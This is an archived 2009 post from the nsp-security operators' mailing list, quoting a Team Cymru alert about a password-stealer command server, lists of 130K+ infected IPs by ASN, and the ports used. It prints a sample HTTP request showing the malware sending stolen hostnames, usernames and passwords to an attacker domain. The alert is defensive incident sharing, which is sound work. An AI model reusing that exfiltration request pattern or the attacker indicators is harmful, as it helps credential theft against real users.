[nsp-sec] ACK: Re: 130K+ Infected Ips on ~3600 ASNs
Steven Matkoski
matkoski at nysernet.org
Thu Oct 1 15:18:54 EDT 2009
Passing along to: 93, 4190, 6124, 22990, 24642, 26677, 31822, 33703, 35999
tx.
-s.
At 01:47 PM 10/1/2009, Stephen Gill wrote:
>----------- nsp-security Confidential --------
>
>Hi Team,
>
>This password stealer head end IP appears to be quite busy:
>
>76.73.37.250
>
>We're working w/ the ISP on takedown, however in the meantime here is a list
>of 130K+ infected Ips seen talking to it primarily via TCP 80 (reporting
>stolen credentials) and UDP 7006 - UDP 7012. I don't anticipate an IP
>takedown to last forver because they can likely re-route via DNS.
>
> ASN list:
> https://www.cymru.com/nsp-sec/Owned/stealer/asns.txt
>
> Infected IP list:
> https://www.cymru.com/nsp-sec/Owned/stealer/
> eg https://www.cymru.com/nsp-sec/Owned/stealer/as3.txt
>
>Timestamps in UTC.
>
>Some clarification on the formatting:
>
>3 | 18.26.4.9 | U 2009/10/01 03:44:49.511524 | MIT-GATEWAYS -
>Massachusetts Institute of Technology
>
>The timestamp column will begin with a U or a T. U is for UDP, T for TCP.
>When possible we've preferred to list out a T if we have seen any TCP 80
>traffic from the client IP in question.
>
>It looks like the malware on the client may choose its source IP address
>since we noticed some RFC 1918 traffic so it is possible the UDP data will
>not match in all cases. I cannot guarantee that the UDP traffic is not part
>of some type of actual software but it sure looks suspicious. Here is a
>public URL for reference:
>
> http://www.prevx.com/filenames/1240768162315901-X1/CDSETUP.EXE.html
>
>As there is UDP involved we cannot guarantee that there are 0 spoofed Ips,
>but on the TCP side that is another matter.
>
>HTTP credential stealing looks something like this:
>
>GET
>/pp2/?s=http%3a%2f%2fwww.STOLEN_HOSTNAME.com%2findex.php&u=%STOLEN_USERNAME&
>p=STOLEN_PASSWORD HTTP/1.1
>User-Agent: Mozilla/4.0 (compatible).
>Host: hotshows.org.
>.
>
>
>Cheers,
>-- steve
>
>--
>Stephen Gill, Chief Scientist, Team Cymru
>http://www.cymru.com | +1 630 230 5423 | gillsr at cymru.com
>
>
>
>
>_______________________________________________
>nsp-security mailing list
>nsp-security at puck.nether.net
>https://puck.nether.net/mailman/listinfo/nsp-security
>
>Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
>community. Confidentiality is essential for effective Internet
>security counter-measures.
>_______________________________________________
More information about the nsp-security
mailing list